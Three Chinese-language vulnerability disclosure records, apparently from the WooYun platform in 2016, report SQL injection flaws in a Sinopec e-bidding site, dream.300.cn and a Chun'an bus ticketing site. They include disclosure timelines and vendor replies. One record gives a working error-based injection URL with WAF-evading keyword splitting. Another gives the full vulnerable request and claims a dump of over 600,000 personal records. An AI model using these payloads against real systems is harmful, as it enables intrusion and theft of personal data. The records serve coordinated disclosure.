漏洞详情披露状态： 2016-04-29： 细节已通知厂商并且等待厂商处理中2016-05-03： 厂商已经确认，细节仅向厂商公开2016-05-13： 细节向核心白帽子及相关领域专家公开2016-05-23： 细节向普通白帽子公开2016-06-02： 细节向实习白帽子公开2016-06-17： 细节向公众公开简要描述： 详细说明：搜索功能中参数keyword存在注入：code 区域http://ebidding.sinopec.com:8880/TPWeb4AAA/Showinfo/SearchResult.aspx?keyword="查询内容"&searchtype=title 报错注入，应该有WAF就不继续深入了漏洞证明：http://ebidding.sinopec.com:8880/TPWeb4AAA/Showinfo/SearchResult.aspx?&searchtype=title&keyword=1' exec('selec'%2b't convert(int,(@@version))')select name orderNum,name InfoDate,name PubInWebDate from[sysobjects]where'1'='修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-05-03 16:05厂商回复：谢谢！我们会尽快修复。最新状态：暂无

漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-27： 厂商已经确认，细节仅向厂商公开2016-05-07： 细节向核心白帽子及相关领域专家公开2016-05-17： 细节向普通白帽子公开2016-05-27： 细节向实习白帽子公开2016-06-11： 细节向公众公开简要描述：RT详细说明：http://dream.300.cn/?id=734存在注入：再次提醒：和刚才的库一一对应：漏洞证明： 修复方案：排查！版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-04-27 11:00厂商回复：正在处理最新状态：暂无

漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述：(千岛湖)淳安网上售票某处存在sql注入可导致百万信息泄漏（姓名、手机号、身份证、座位号、价格等）详细说明：注入点：code 区域GET /BusTicketInfo.go?method=queryTicketInfo&startName=%E5%85%A8%E9%83%A8%E8%BD%A6%E7%AB%99&pszBusdate=2016-04-28&endName=%E6%9D%AD%E5%B7%9E&proxyId=02&sellstationid=&dt=1461638035938&type=web&t=Tue%20Apr%2026%202016%2010:33:55%20GMT+0800%20(CST) HTTP/1.1 Host: **.**.**.** Accept-Encoding: gzip, deflate Cookie: JSESSIONID=199E13C9ACC9BFFF222962A9C39B6E63 Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 MicroMessenger/6.3.15 NetType/WIFI Language/zh_CN Referer: http://**.**.**.**/page/522 Accept-Language: zh-cn X-Requested-With: XMLHttpRequest参数pszBusdate存在sql注入跑一个表看看 60多万 漏洞证明：跑一个表看看 60多万 修复方案：过滤版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-04-29 17:02厂商回复：CNVD确认所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置.最新状态：暂无